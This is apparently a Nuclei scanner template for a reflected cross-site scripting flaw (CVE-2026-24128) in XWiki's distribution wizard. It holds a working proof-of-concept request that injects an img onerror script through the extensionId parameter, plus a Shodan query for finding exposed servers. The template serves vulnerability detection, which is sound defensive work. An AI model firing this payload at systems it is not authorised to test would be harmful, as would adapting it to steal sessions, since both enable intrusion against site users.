id: CVE-2026-24128

info:
  name: XWiki Platform Distribution Flavor Main - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    XWiki Platform Distribution Flavor Main versions prior to 17.6.0 are vulnerable to reflected cross-site scripting (XSS): the value of the extensionId parameter on the distribution wizard page (xpage=distribution) is reflected into the HTML response without proper output encoding. An attacker who gets a victim to open a crafted link can execute arbitrary JavaScript in the victim's browser, in the context of the XWiki origin, potentially leading to session hijacking or other attacks.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-23462
    - https://nvd.nist.gov/vuln/detail/CVE-2026-24128
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-24128
    epss-score: 0.00073
    epss-percentile: 0.22198
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    vendor: XWiki
    product: xwiki-platform-distribution-flavor-main
    shodan-query: html:"data-xwiki-reference"
  tags: cve,cve2026,xwiki,xss

http:
  - raw:
      - |
        GET /xwiki/bin/view/XWiki/Main?xpage=distribution&extensionSection=progress&extensionId=org.xwiki.platform%3Axwiki-platform-distribution-flavor-mainwikia7jdh%3Cimg%20src%3Da%20onerror%3Dalert(document.domain)%3Eh5kturc1hk&extensionVersion=17.6.0&extensionNamespace=wiki%3Axwiki&extensionAction=install HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers-condition: and
    matchers:
      # The payload must come back as live markup (unencoded), not as &lt;img ...&gt;,
      # and the response must be the extension job page rather than a generic error page.
      - type: word
        part: body
        words:
          - "<img src=a onerror=alert(document.domain)>"
          - "xwiki.extension.job"
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b52a96efdf47bea8af2aa4a8981f40f56c5e1475e787e688fd37ede4ae38c283022100db31f9bd7d1c4edbe5428d069569ea59b488b78c6134013fb924ec9c22f8fd36:922c64590222798bb761d5b6d8e72950